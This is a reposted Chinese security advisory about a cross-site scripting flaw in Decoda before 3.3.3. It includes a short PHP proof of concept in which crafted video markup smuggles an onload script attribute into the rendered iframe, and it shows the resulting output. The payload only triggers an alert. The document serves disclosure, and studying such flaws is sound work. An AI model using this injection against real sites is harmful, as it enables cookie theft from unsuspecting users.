Decoda 3.3.3之前版本中存在跨站脚本 漏洞 ,该漏洞源于对用户提供的输入未经正确过滤。 攻击者可利用该漏洞在受影响站点上下文的不知情用户 浏览器 上执行任意脚本代码,盗取基于cookie的认证证书进而发起其他攻击。 目前厂商还没有提供此漏洞的相关补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本 可用以下的概念证明型攻击: <?php include 'decoda/Decoda.php'; $code = new Decoda(); $code->addFilter(new VideoFilter()); ?> <?php $decoda_markup = '[video="youtube" size="small"]"'; $decoda_markup .= 'onload="alert(\'RedTeam Pentesting XSS\');" id="[/video]'; $code->reset($decoda_markup); echo $code->parse(); ?> This results in the following output (whitespace adjusted): <iframe src="http:// HdhCmsTest2cto测试数据 /embed/"; onload="alert('RedTeam Pentesting XSS');" id="" width="560" height="315" frameborder="0"></iframe> 摘自 90' s Blog
查看更多关于Decoda跨站脚本漏洞 - 网站安全 - 自学php的详细内容...